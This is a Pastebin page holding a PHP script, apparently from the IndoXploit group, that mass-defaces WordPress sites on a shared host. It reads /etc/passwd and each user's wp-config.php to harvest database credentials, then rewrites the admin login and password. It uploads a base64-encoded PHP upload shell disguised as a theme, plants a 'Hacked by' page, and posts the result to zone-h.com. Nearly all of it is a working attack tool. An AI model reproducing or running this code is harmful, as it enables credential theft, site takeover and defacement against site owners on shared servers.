API tools faq
paste
jackwilder

IndoXploit WordPress Auto Deface + Zone-H Submit

jackwilder
Jan 29th, 2016
1,999
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.63 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //how to use : https://www.youtube.com/watch?v=q72Rp8QM4xI
  3. //Tu5b0l3d
  4. //IndoXploit
  5. //http://indoxploit.blogspot.com/ - linuxsec.org
  6. error_reporting(0);
  7. $zh = "LooptheLoop"; // zone-h nick
  8. $jembut = "jack"; // add username wordpress
  9. $jembut2 = "linuxsec"; // add password wordpress
  10. $kontol = "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by LinuxSec<p style='color: transparent'><title>Hacked by Nabilaholic404</title>"; // script deface
  11.  
  12. ######################################################################
  13. // script di bawah tidak perlu di otak atik
  14. // jangan pernah mengubah nama file ( k.php ) dan ( m.php ) , atau auto deface tidak akan berjalan
  15. echo "<body bgcolor=black>";
  16. echo "<font color=green>";
  17. echo "<title>IndoXploit WordPress Auto Deface</title>";
  18. cover("IndoXploit");
  19.  
  20. function save($data){
  21.         $fp = @fopen("indo.htm", "a") or die("cant open file");
  22.         fwrite($fp, $data);
  23.         fclose($fp);
  24. }
  25.  
  26. function anucurl($sites){
  27.         $ch1 = curl_init ("$sites");
  28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  33. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  34. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  35. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  36. $data = curl_exec ($ch1);
  37. return $data;
  38.     }
  39.  
  40. function lohgin($cek, $web, $userr, $pass){
  41.         $post = array(
  42.                     "log" => "$userr",
  43.                     "pwd" => "$pass",
  44.                     "rememberme" => "forever",
  45.                     "wp-submit" => "Log In",
  46.                     "redirect_to" => "$web/wp-admin/",
  47.                     "testcookie" => "1",
  48.                     );
  49. $ch = curl_init ("$cek");
  50. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  51. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  53. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  54. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  55. curl_setopt ($ch, CURLOPT_POST, 1);
  56. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  57. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  58. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  59. $data6 = curl_exec ($ch);
  60. return $data6;
  61.     }
  62.  
  63. function cover($indoXploit){
  64.     echo "<center><font size='5px'> WordPress Auto Deface Coded by $indoXploit</font><br>";
  65.     echo "Deface Result : <a href='indo.htm' style='text-decoration: none'>indo.htm</a></center><br><br><br>";
  66. }
  67.  
  68. function ambilKata($param, $kata1, $kata2){
  69.     if(strpos($param, $kata1) === FALSE) return FALSE;
  70.     if(strpos($param, $kata2) === FALSE) return FALSE;
  71.     $start = strpos($param, $kata1) + strlen($kata1);
  72.     $end = strpos($param, $kata2, $start);
  73.     $return = substr($param, $start, $end - $start);
  74.     return $return;
  75. }
  76.  
  77.  
  78. $a = file_get_contents('/etc/passwd');
  79.     preg_match_all('/(.*?):x:/', $a, $data);
  80.     foreach($data[1] as $user){
  81. $baca = file_get_contents("/home/$user/public_html/wp-config.php");
  82.  
  83.  /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt');  */
  84.  
  85. if($baca!=""){
  86.    
  87.  
  88. /* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
  89.  
  90. $file1 = "$user-config.txt";
  91. $fp2 = fopen($file1,"w");
  92. fputs($fp2,$baca);
  93.  
  94. $file = @file_get_contents($file1);
  95.  
  96.  
  97. echo $user."-> sukses<br>";
  98.                     $host = ambilkata($file,"DB_HOST', '","'");
  99.                     $username = ambilkata($file,"DB_USER', '","'");
  100.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
  101.                     $db = ambilkata($file,"DB_NAME', '","'");
  102.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
  103.                     $user_baru = $jembut;
  104.                     $password_baru = $jembut2;
  105.                     $prefix = $db.".".$dbprefix."users";
  106.                     $sue = $db.".".$dbprefix."options";
  107.                     $pass = md5("$password_baru");
  108.                     $nick = $kontol;
  109.  
  110. echo "# Db Host: $host<br>";
  111. echo "# Db user: $username<br>";
  112. echo "# Db Password: $password<br>";
  113. echo "# Db name: $db<br>";
  114. echo "# Table_Prefix: $dbprefix<br>";
  115.  
  116. mysql_connect($host,$username,$password);
  117.  
  118.         mysql_select_db($db);
  119.  
  120.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  121.         $r=mysql_fetch_array($tampil);
  122.         $id = $r[ID];
  123.  
  124.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  125.         $r2=mysql_fetch_array($tampil2);
  126.         $target = $r2[option_value];
  127.          echo "# $target<br>";
  128.        
  129.  
  130.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  131.  
  132. $site= "$target/wp-login.php";
  133. $site2= "$target/wp-admin/theme-install.php?upload";
  134. $a = lohgin($site, $target, $user_baru, $password_baru);
  135. $b = lohgin($site2, $target, $user_baru, $password_baru);
  136.            
  137.  
  138. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  139. echo "# token -> $anu2<br>";
  140.  
  141.  
  142. $upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  143.  
  144. $www = "m.php";
  145. $fp5 = fopen($www,"w");
  146. fputs($fp5,$upload3);
  147.  
  148. $c = file_get_contents($w);
  149.    
  150.   $post2 = array(
  151.                     "_wpnonce" => "$anu2",
  152.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  153.                     "themezip" => "@m.php",
  154.                     "install-theme-submit" => "Install Now",
  155.                     );
  156. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  157. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  158. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  159. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  160. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  161. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  162. curl_setopt ($ch, CURLOPT_POST, 1);
  163. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  164. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  165. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  166. $data3 = curl_exec ($ch);
  167.  
  168. $namafile = "wew.php";
  169. $fp2 = fopen($namafile,"w");
  170. fputs($fp2,$nick);
  171.  
  172. $y = date("Y");
  173. $m = date("m");
  174.  
  175.  
  176. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  177. curl_setopt($ch6, CURLOPT_POST, true);
  178. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  179. array('file3'=>"@$namafile"));
  180. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  181. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  182. $postResult = curl_exec($ch6);
  183. curl_close($ch6);
  184.  
  185. $as = "$target/k.php";
  186. $bs = file_get_contents($as);
  187.  if(preg_match("#hacked#si",$bs)){
  188.                         echo "[+] <font color='cyan'>Deface success..<br>";
  189.                         echo "[+] $as<br>";
  190.                         save($as."<br>");
  191.                         echo "[+] zone-h: ";
  192.                         $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  193.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  194.                         curl_setopt ($ch3, CURLOPT_POST, 1);
  195.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$as&hackmode=1&reason=1");
  196.                        
  197.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  198.                 echo  " Ok  <br><br>";
  199.         }else{
  200.                 echo " No <br><br></font>";}
  201.                     }
  202.                     else{
  203.                         echo "[!] <font color='red'>Deface Failed..<br>";
  204.                         echo "[!] Try manual deface at : <br>";
  205.                         echo "[!] $target/wp-login.php<br>";
  206.                         echo "[!] username: $user_baru<br>";
  207.                         echo "[!] password: $password_baru<br><br><br></font>";
  208.  
  209.                        
  210.                     }
  211.     }
  212. else{
  213.     echo "$user <= No<br>";
  214. }
  215.  
  216.  
  217.  
  218. }
  219.  
  220.  
  221. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!